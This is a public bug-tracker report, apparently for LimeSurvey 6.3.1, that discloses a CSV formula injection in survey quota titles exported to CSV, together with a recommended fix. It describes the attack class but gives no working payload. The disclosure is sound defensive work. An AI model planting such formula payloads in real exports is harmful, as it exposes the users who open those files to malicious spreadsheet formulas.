View Issue Details
|ID||Project||Category||View Status||Date Submitted||Last Update|
|19253||Bug reports||Security||public||2023-11-20 12:15||2023-11-20 12:16|
|Summary||19253: CSV injection in export quota|
When using a spreadsheet program like Microsoft Excel or LibreOffice Calc to open a CSV file, the software interprets any cell that begins with "=" as a formula. CSV injection, also known as formula injection, occurs when websites incorporate user-supplied data into CSV files without proper validation.
|Steps To Reproduce|
Steps to reproduce
(Replace this text with detailed step-by-step instructions on how to reproduce the issue)
(Write here what you expected to happen)
(Write here what happened instead)
|Tags||No tags attached.|
|Complete LimeSurvey version number (& build)||6.3.1+231023|
|I will donate to the project if issue is resolved||No|
|Database type & version||not relevant|
|Server OS (if known)||not relevant|
|Webserver software & version (if known)||not relevant|
|PHP Version||not relevant|
It has been detected the possibility of injecting CSV formulas into the titles of survey quotas, which can subsequently be exported to CSV.
To mitigate this vulnerability, it is recommended to validate the input entered by a user to ensure that no cell begins with any of the following characters:
Equal to ("=")
On its own, this functionality would not have a high impact, as the CSV quotas can only be exported by the same user. However, considering the vulnerability which allows the editing of quotas belonging to others, an attacker could add malicious formulas to another user, which would be executed when that user exports their quotas.
6.png (118,467 bytes)